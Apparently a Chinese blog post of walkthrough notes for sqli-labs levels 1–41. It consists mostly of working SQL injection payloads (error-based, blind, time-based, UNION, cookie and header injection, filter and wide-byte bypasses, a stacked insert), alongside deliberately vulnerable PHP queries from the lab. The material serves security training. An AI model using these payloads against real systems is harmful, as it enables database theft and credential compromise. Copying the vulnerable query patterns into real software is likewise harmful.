sqli-less 筆記

託帕發表於2018-08-03

一   ' 
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23

二   數值 
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23

三  ')
?id=1'
?id=1') and 1=1%23
?id=1') and 1=2%23

四   ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23

五   '   報錯
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

六    "   報錯
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

七   ')) 盲注
1')) and length(database())=8 %23    //求資料庫的長度
1')) and ascii(substr(database(),1,1))=115%23    //求資料庫名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23    //求表的數量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23  //求表名的ascii碼值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23   //求列的數量  
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23   //求列名的ascii碼值
1')) and (select count(username) from security.users)=13 %23  //求欄位的內容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23   //求欄位的ascii碼值

八     '  盲注
(參考七)

九     ' 時間型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23

十     " 時間型盲注
(參考九)

十一    '報錯
// Less-11 login query: $uname and $passwd are interpolated directly into the
// string between single quotes; no escaping is visible here, so a ' in either
// field ends the literal and the rest is parsed as SQL (see payloads below).
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username輸入:admin
password輸入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#

十二  ")報錯
// Less-12: each field is wrapped in double quotes in PHP, then placed inside
// parentheses in the query, giving username=("...") and password=("...").
// Nothing escapes a " in the input, so the closing sequence is ") (as in the payload).
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username輸入:admin
password輸入:1") and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)

十三   ')報錯
// Less-13: fields sit inside ('...'), so the closing sequence is ') ; values are
// interpolated unescaped.
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username輸入:admin
password輸入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)

十四  "報錯
// Less-14: double-quote wrapping without parentheses, so a bare " closes the
// literal (payload: admin" and ...). No escaping is applied to the input.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username輸入:admin
password輸入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)


十五   '(布林型、時間)盲注
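// Less-15: same unescaped single-quote interpolation as Less-11; the heading
// marks this level as blind, hence the boolean/time-based probe below.
// (The transcription was missing the closing " of the PHP string; restored.)
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";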
username輸入:admin
password輸入:admin' and sleep(if(length(database())>10,0,5))#

十六   "(布林型、時間)盲注
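// Less-16: double-quote wrapping inside parentheses, closing sequence ") ;
// worked blind (time-based) per the heading. No escaping of the input.
// (The transcription was missing the closing " of the PHP string; restored.)
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";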
username輸入:admin
password輸入:admin") and sleep(if(length(database())>10,0,5))#

十七   報錯
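// Less-17: the SELECT only uses the username; the password is interpolated,
// unescaped, into the UPDATE, so the injection point is the password field
// and the error-based payload runs inside an UPDATE (hence "or ... or '1"
// rather than a comment). $row1 is presumably the username returned by the
// SELECT — not shown here.
// (The transcription was missing the closing " of the first PHP string; restored.)
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";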
username   admin
password   admin' or updatexml(1,concat(0x7e,(database())),0) or '1

十八   User-Agent報錯  burp攔截
username   admin
password   admin
// Less-18: the User-Agent header is read straight from $_SERVER and written
// into an INSERT with no escaping, so the header is the injection point
// (edit it in the proxy). Note $uname is interpolated without quotes here.
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent後加    1' or updatexml(1,concat(0x7e,(database())),0) or '

十九      referer報錯  burp攔截
// Less-19: same pattern as Less-18 but the Referer header is the unescaped
// value written into the INSERT.
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer後加   1' or updatexml(1,concat(0x7e,(database())),0) or '

二十    '  burp攔截   聯合查詢
第一步:用某一個賬號aaa登入成功
第二步:重新整理頁面,用burp攔截,修改cookie欄位 
// Less-20: the uname cookie set at login is interpolated unescaped inside
// single quotes on the next page load; the query is SELECT *, so a UNION with
// matching column count echoes attacker-chosen columns.
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa後輸入    ' order by 3%23
在uname=aaa後輸入    ' and 1=2 union select 1,2,3%23
在uname=aaa後輸入    ' and 1=2 union select 1,database(),3%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

二十一    ')  burp攔截   聯合查詢
// Less-21: the cookie is base64-decoded before use, so payloads must be sent
// base64-encoded; the decoded value lands unescaped inside ('...'), closing
// sequence ') .
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
與二十題基本相似,不同的是,閉合條件為單引號加括號,cookie中uname編碼為base64
uname=aaa') order by 3#   ->    uname=YWFhJykgb3JkZXIgYnkgMyM=
uname=aaa') and 1=2 union select 1,2,3#   ->    uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()#   ->    uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(參考二十)

二十二   "   burp攔截   聯合查詢
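// Less-22: cookie is base64-decoded and then wrapped in double quotes; nothing
// escapes a " inside the decoded value, so " closes the literal.
// (A truncated duplicate line `$cookee = $_C` was removed from the transcription.)
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";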
與二十一題基本相似,不同的是,閉合條件為雙引號
(參考二十一)


二十三  '  聯合查詢
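// Less-23: the comment sequences "#" and "--" are removed, so payloads cannot
// end in a comment; instead they close the trailing quote (e.g. ... where '1'='1).
// NOTE(review): the original transcription read $_GET['id'] *after* the two
// preg_replace calls, which would filter an unset variable and then overwrite
// it with the raw input; the read belongs first.
$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);   // strip "#"
$id = preg_replace($reg1, $replace, $id);  // strip "--"
// the filtered value is still interpolated unescaped inside single quotes
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";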
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1


二十四
使用者註冊login_create.php
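// Less-24 registration: values are wrapped in double quotes, so a username
// containing a single quote (admin'#) is accepted and stored as-is; it only
// becomes dangerous where it is later reused unescaped (pass_change.php).
// (A stray "、" after the statement was removed from the transcription.)
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";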
username輸入:admin'#
password隨意

使用者登入login.php
// Less-24 login: both POST fields go through mysql_real_escape_string before
// interpolation, so this query is not the injection point.
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

密碼修改pass_change.php
// Less-24 password change: the three POST fields are escaped, but the username
// is taken from the session (the value stored at registration) and is
// interpolated with no escaping at all. A stored name of admin'# closes the
// quote and comments out "and password='$curr_pass'", so the UPDATE rewrites
// admin's password — the second-order injection.
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次注入(second-order injection):註冊時 admin'# 被雙引號包住直接存入資料庫;改密碼時 username 取自 $_SESSION,而不是經過 mysql_real_escape_string 的 POST 參數,拼進 UPDATE 後單引號被閉合、# 註解掉後面的 and password='$curr_pass',最後改掉的是 admin 的密碼。

二十五     聯合查詢  
$id=$_GET['id'];
$id= blacklist($id);
// Less-25 keyword blacklist: each pattern is applied in a single preg_replace
// pass, so doubling the keyword ("anandd", "oorr") leaves the original behind
// after the strip — that is what the payloads below rely on. The "or" rule
// also hits "order", "information_schema" and "password", which is why those
// are written as oorrder / infoorrmation_schema / passwoorrd.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        // removes every "or" (case-insensitive), once
    $id= preg_replace('/AND/i',"", $id);       // removes every "and" (case-insensitive), once
    
    return $id;
}
// the filtered value is still interpolated unescaped inside single quotes
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1

二十五a   聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-25a: same single-pass or/and blacklist as Less-25, but the id is
// numeric (no quotes in the query), so no closing quote is needed.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        // removes every "or" (case-insensitive), once
    $id= preg_replace('/AND/i',"", $id);       // removes every "and" (case-insensitive), once
    
    return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// Illustration only: the query with the error-based payload written as sent.
// After blacklist() "oorr" has become "or", and %23 is already decoded to "#"
// by the time the parameter reaches PHP.
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";

1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23

二十六   聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-26 blacklist. Every rule is one preg_replace pass, so doubled keywords
// ("anandd", "infoorrmation_schema", "passwoorrd") survive as in Less-25; the
// comment characters are gone, so payloads close the quote with '1'='1 instead.
// The payloads below separate tokens with %0B (vertical tab), assuming `\s`
// does not match it. NOTE(review): newer PCRE (bundled from roughly PHP 5.5.10)
// does include VT in `\s`, so %0B may be stripped on a current stack — verify
// against the target's PHP/PCRE version before relying on it.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //character class: strips every '/' and '*' byte, not just the "/*" sequence
    $id= preg_replace('/[--]/',"", $id);        //character class: strips every '-' byte
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out whitespace (see the %0B note above)
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out '/' and '\' bytes
    return $id;
}
// the filtered value is still interpolated unescaped inside single quotes
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1

二十六a聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
// Less-26a: identical blacklist to Less-26; only the closing context differs,
// id=('...'), so payloads open with ') and close with ('1'='1.
// Same caveat as Less-26: the %0B separator assumes `\s` does not match VT,
// which is no longer true on newer PCRE — verify on the target.
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //character class: strips every '/' and '*' byte
    $id= preg_replace('/[--]/',"", $id);        //character class: strips every '-' byte
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out whitespace
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out '/' and '\' bytes
    return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1

二十七
// Less-27 blacklist. The union/select rules carry no /i flag (the /m and /s
// modifiers do not change matching here), so mixed case such as "uNion" and
// "selEct" passes untouched — that is the bypass used below. "[ +]" is a
// character class: it removes ' ' and '+' bytes only, which is why %0B is used
// as the token separator (same PCRE `\s`/VT caveat does not apply here, since
// `\s` is not used, but the "[ +]" class could be extended on other targets).
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //character class: strips every '/' and '*' byte
$id= preg_replace('/[--]/',"", $id);        //character class: strips every '-' byte
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //strips ' ' and '+' bytes only
$id= preg_replace('/select/m',"", $id);        //lowercase "select" only (case-sensitive)
$id= preg_replace('/[ +]/',"", $id);        //strips ' ' and '+' bytes only (repeated)
$id= preg_replace('/union/s',"", $id);        //lowercase "union" only
$id= preg_replace('/select/s',"", $id);        //lowercase "select" only
$id= preg_replace('/UNION/s',"", $id);        //uppercase "UNION" only
$id= preg_replace('/SELECT/s',"", $id);        //uppercase "SELECT" only
$id= preg_replace('/Union/s',"", $id);        //"Union" only
$id= preg_replace('/Select/s',"", $id);        //"Select" only
return $id;
}
// the filtered value is still interpolated unescaped inside single quotes
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1

二十七a
// Less-27a: same blacklist as Less-27 (not repeated in the notes); the id is
// wrapped in double quotes, so payloads open with 1" and close with "1"="1.
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1


二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// Less-28 blacklist: the only keyword rule is case-insensitive and removes the
// exact "union<whitespace>select" pair in one pass. The payloads below put %0B
// between the two words, assuming `\s` does not match VT.
// NOTE(review): on newer PCRE `\s` does match VT, so "uNion%0BselEct" would be
// removed; the single-pass nature then suggests the Less-25 doubling idea
// (a nested union/select pair) — verify on the target before relying on either.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //character class: strips every '/' and '*' byte
$id= preg_replace('/[--]/',"", $id);                //character class: strips every '-' byte
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //strips ' ' and '+' bytes only
//$id= preg_replace('/select/m',"", $id);                    //disabled in this level
$id= preg_replace('/[ +]/',"", $id);                //strips ' ' and '+' bytes only (repeated)
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT (one pass, case-insensitive)
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1

二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// Less-28a: every rule except the union/select pair is commented out, so "#"
// and spaces would actually survive here; the notes reuse the Less-28 payload
// shape anyway. Same `\s`/VT caveat as Less-28 for the %0B separator.
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);                //disabled
//$id= preg_replace('/[--]/',"", $id);                //disabled
//$id= preg_replace('/[#]/',"", $id);                    //disabled
//$id= preg_replace('/[ +]/',"", $id);                //disabled
//$id= preg_replace('/select/m',"", $id);                    //disabled
//$id= preg_replace('/[ +]/',"", $id);                //disabled
$id= preg_replace('/union\s+select/i',"", $id);        //only active rule: remove "union<ws>select" once, case-insensitive
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1

二十九   
// Less-29: plain single-quote interpolation, no visible filter; standard
// UNION workflow with "#" (%23) as the comment.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23


三十   
// Less-30: id wrapped in double quotes in PHP, no escaping; closing token is ".
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十一
// Less-31: double quotes plus parentheses, closing sequence ") .
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十二  寬位元組注入
$id=check_addslashes($_GET['id']);
// Less-32 hand-rolled escaping: a backslash is put before \, ' and ".
// The payloads send %df before the quote: %df' becomes %df\' (0xDF 0x5C 0x27);
// under a multibyte connection charset such as GBK, 0xDF 0x5C is consumed as one
// two-byte character and the quote is left unescaped — the "wide byte" case the
// heading refers to (presumes the lab connects with GBK; verify on the target).
// Because quotes are escaped, string constants in the payloads are written as
// hex literals (0x7365637572697479 = 'security', 0x7573657273 = 'users').
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);             // \  -> escaped backslash
$string = preg_replace('/\'/i', '\\\'', $string);                                  // '  -> \'
$string = preg_replace('/\"/', "\\\"", $string);                                  // "  -> \"
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十三
$id=check_addslashes($_GET['id']);
// Less-33: same as Less-32 but using PHP's addslashes(), which is not charset
// aware, so the %df wide-byte trick and the hex string literals apply unchanged.
function check_addslashes($string)
{
    $string= addslashes($string);    // backslash before \, ', " and NUL
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十四   聯合 burp攔截
// Less-34: POST login with addslashes() on both fields; the query has only two
// selected columns, hence "union select 1,2". The %df wide-byte prefix is the
// same bypass as Less-33, applied in the username field.
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(即 'admin' 的十六進位表示;因引號會被 addslashes 轉義,字串常數改用十六進位寫法)
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23


三十五
// Less-35: excerpt — check_addslashes() again wraps addslashes(), but the id is
// numeric and never quoted in the query, so escaping quotes changes nothing;
// the payloads need no quote at all (hex literals are still used for strings).
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十六 MYSQL檔案裡面的my.ini裡面的gbk改為Latin1 
$id=check_quotes($_GET['id']);
// Less-36: mysql_real_escape_string() is charset-aware, so the %df wide-byte
// bypass only works when the charset the escaper assumes differs from the one
// the server actually decodes with (the heading mentions a my.ini charset
// tweak; presumably that is what sets up the mismatch — verify on the target).
function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    // escapes per the connection charset it knows about
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十七  burp攔截
// Less-37: POST login, two selected columns; the escaping function is not
// shown in the notes but the payloads reuse the %df wide-byte prefix from Less-34.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23

三十八 ' 基於聯合查詢的堆疊注入
// Less-38: unescaped single-quote interpolation; the heading says stacked
// queries are executed here (presumably via a multi-statement API — not shown),
// which is what lets "1';insert into ..." write a new row.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23


三十九  數值
// Less-39: numeric id, no quotes to close; stacked queries as in Less-38.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十  ')
// Less-40: ('...') context, closing sequence ') ; stacked queries as in Less-38.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十一
// Less-41: numeric id; same workflow as Less-39.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
